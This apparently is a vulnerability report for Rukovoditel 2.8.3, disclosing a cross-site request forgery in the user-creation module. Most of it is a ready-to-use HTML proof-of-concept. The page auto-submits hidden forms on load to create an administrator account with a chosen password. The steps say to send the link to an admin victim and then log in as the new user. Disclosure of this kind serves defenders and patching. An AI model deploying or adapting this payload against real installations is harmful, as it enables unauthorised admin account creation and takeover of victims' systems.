## Bug Description
Hi. I found a CSRF in the module add new user in Rukovoditel 2.8.3. Hacker can add new user with admin privilege.
## How to Reproduce
Steps to reproduce the behavior:
1. Create a CSRF POC using the following code.
Code: Select all
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Cross Site Request Forgery</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
function fireForms()
{
var count = 2;
var i=0;
for(i=0; i<count; i++)
{
document.forms[i].submit();
}
}
</script>
<H2>Cross Site Request Forgery</H2>
<form method="POST" name="form1" action="http://localhost//rukovoditel_2.8.3/index.php?module=users/validate_form">
<input type="hidden" name="username" value="admin1"/>
<input type="hidden" name="useremail" value="admin1@admin.com"/>
</form>
<form method="POST" name="form0" action="http://localhost//rukovoditel_2.8.3/index.php?module=items/&action=save">
<input type="hidden" name="path" value="1"/>
<input type="hidden" name="redirect_to" value=""/>
<input type="hidden" name="parent_item_id" value="0"/>
<input type="hidden" name="fields[5]" value="1"/>
<input type="hidden" name="fields[14]" value="default"/>
<input type="hidden" name="fields[6]" value="0"/>
<input type="hidden" name="fields[12]" value="admin1"/>
<input type="hidden" name="password" value="admin1pass"/>
<input type="hidden" name="fields[7]" value="admin1pass"/>
<input type="hidden" name="fields[8]" value="Name is Nothing"/>
<input type="hidden" name="fields[10]" value=""/>
<input type="hidden" name="fields[9]" value="admin1@admin.com"/>
<input type="hidden" name="fields[13]" value="english.php"/>
</form>
</form>
</body>
</html>
2. Replace the URI to path to Rukovoditel 2.8.3 folder and change password field.
3. Send the link script to the victim (admin) to make them click.
4. Login with new user.
## Server Information
Xampp on Windows 10
### PHP Operating System
Windows NT DESKTOP-BDPIT37 10.0 build 18363 (Windows 10) AMD64
### PHP Version
PHP Version 7.4.15